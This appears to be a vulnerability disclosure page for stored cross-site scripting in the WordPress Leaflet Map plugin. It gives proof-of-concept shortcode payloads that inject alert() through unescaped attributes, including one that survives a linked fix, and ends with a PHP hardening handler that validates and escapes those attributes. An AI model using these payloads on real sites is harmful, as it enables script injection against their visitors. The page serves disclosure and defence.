## https://sploitus.com/exploit?id=WPEX-ID:4B7C61DA-952C-492A-8CE6-3C2126942A7C
Most of the shortcode attributes are not escaped; the following is just one example:

```
[leaflet-map lat="alert('lat')||37.4871" lng="alert('lng')||126.6794" tileurl="'+alert('tileurl');baseUrl='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" detect_retina="alert('detect_retina')" min_zoom="alert('min_zoom')||1" max_zoom="alert('max_zoom')||200" zoomControl="alert('zoomcontrol')" scrollWheel="alert('scrollWheel')||true" doubleClickZoom="alert('doubleClickZoom')" zoom="alert('zoom')||10" height='100px;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(String.fromCharCode(104,101,105,103,104,116))" data-x="']
```

Or:

```
[leaflet-circle fitbounds="0;});alert('fitbounds');(!function(){void 1" lat="0;});alert('lat');(!function(){void 1" lng="0;});alert('lng');(!function(){void 1" shape='});alert("shape")//' message='a']
```

After review of the updated changes (https://github.com/bozdoz/wp-plugin-leaflet-map/pull/138/files):

```
[leaflet-circle shape='});alert("shape")//' message='a']
```
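A defensive counterpart, added here and not taken from the plugin or from the linked PR: a shortcode handler that coerces each attribute named in the PoC above to its expected type and hands the result to the page as escaped JSON in a data attribute, so no attribute value is ever concatenated into JavaScript or into a `style` attribute. The `lm_*` function names, the defaults and the `data-options` contract with the front-end script are assumptions of this example.

```php
<?php
// Hardening example for the leaflet-map shortcode (hypothetical helper names).
// Each attribute is validated against its expected type; anything else falls
// back to a default instead of being echoed into script or markup.

function lm_float( $value, $default ) {
    // "alert('lat')||37.4871" is not numeric, so the default is used.
    return is_numeric( $value ) ? (float) $value : (float) $default;
}

function lm_bool( $value, $default ) {
    $b = filter_var( $value, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE );
    return null === $b ? (bool) $default : $b;
}

function lm_css_length( $value, $default ) {
    // Only a bare CSS length survives; "100px;animation-name:..." is rejected,
    // which also closes the onanimationend vector from the PoC.
    return preg_match( '/^\d+(\.\d+)?(px|em|rem|%|vh|vw)$/', $value ) ? $value : $default;
}

function lm_tile_url( $value, $default ) {
    // Allow-list: http(s) scheme and the {s}{z}{x}{y} placeholders Leaflet
    // needs. Quotes, "+" and ";" are outside the set, so "'+alert(...)" fails.
    return preg_match( '#^https?://[A-Za-z0-9.\-{}/_?=&%:]+$#', $value ) ? $value : $default;
}

function lm_render_map( $atts ) {
    // shortcode_atts() lowercases attribute names, hence scrollwheel etc.
    $a = shortcode_atts( array(
        'lat' => '37.4871', 'lng' => '126.6794', 'zoom' => '10',
        'min_zoom' => '1', 'max_zoom' => '19', 'height' => '250px',
        'scrollwheel' => 'true', 'doubleclickzoom' => 'true',
        'tileurl' => 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
    ), $atts, 'leaflet-map' );

    $options = array(
        'center'          => array( lm_float( $a['lat'], 37.4871 ), lm_float( $a['lng'], 126.6794 ) ),
        'zoom'            => lm_float( $a['zoom'], 10 ),
        'minZoom'         => lm_float( $a['min_zoom'], 1 ),
        'maxZoom'         => lm_float( $a['max_zoom'], 19 ),
        'scrollWheelZoom' => lm_bool( $a['scrollwheel'], true ),
        'doubleClickZoom' => lm_bool( $a['doubleclickzoom'], true ),
        'tileUrl'         => lm_tile_url( $a['tileurl'], 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png' ),
    );

    // JSON_HEX_* keeps the payload inert even if it later lands inside <script>;
    // esc_attr() handles the attribute context. The front-end script is expected
    // to read JSON.parse(el.dataset.options) and build the map from that object.
    $json = wp_json_encode( $options, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
    return sprintf( '<div class="leaflet-map" style="height:%s" data-options="%s"></div>',
        esc_attr( lm_css_length( $a['height'], '250px' ) ), esc_attr( $json ) );
}
add_shortcode( 'leaflet-map', 'lm_render_map' );
```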